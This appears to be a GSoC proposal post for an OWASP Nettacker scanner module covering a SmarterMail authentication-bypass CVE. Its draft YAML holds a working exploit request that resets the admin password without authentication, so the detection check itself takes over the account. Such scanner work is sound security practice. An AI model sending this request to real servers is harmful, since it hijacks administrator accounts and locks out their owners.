Proposal: Add KEV module for CVE-2026-23760 (SmarterMail Auth Bypass) - GSoC 2026

[humbleleopard]

Hello @samstepanyan, @Ali-Razmjoo, and @arkadiyt!

My name is Cavin, a 3rd-year student at Politeknik Siber dan Sandi Negara. I am highly interested in contributing to OWASP Nettacker for GSoC 2026, specifically focusing on the "Implement more modules (CISA KEV CVEs)" project idea. Since the Slack invite link is currently inactive, I wanted to reach out and propose my first contribution here.

As a proof-of-concept for my GSoC proposal, I would like to create a module for a recent critical CISA KEV: CVE-2026-23760 (SmarterTools SmarterMail Authentication Bypass, CVSS 9.3).

This vulnerability allows unauthenticated attackers to reset the system administrator password via the /api/v1/auth/force-reset-password endpoint.

Here is the initial draft of the declarative YAML logic I plan to implement:

info:
  name: SmarterMail Auth Bypass (CVE-2026-23760)
  author: Cavin Agustinus Sitorus
  severity: critical
  description: Authentication bypass vulnerability in SmarterMail's password reset API.
  reference:
    - [https://labs.watchtowr.com/attackers-with-decompilers-strike-again-smartertools-smartermail-wt-2026-0001-auth-bypass/](https://labs.watchtowr.com/attackers-with-decompilers-strike-again-smartertools-smartermail-wt-2026-0001-auth-bypass/)

requests:
  - method: POST
    path: "/api/v1/auth/force-reset-password"
    headers:
      Content-Type: "application/json"
    body: '{"IsSysAdmin":"true","OldPassword":"watever","Username":"admin","NewPassword":"NewPassword123!@#","ConfirmPassword":"NewPassword123!@#"}'

matchers:
  - type: word
    words:
      - '"success":true'
      - '"resultCode":200'
    condition: and
  - type: status
    status:
      - 200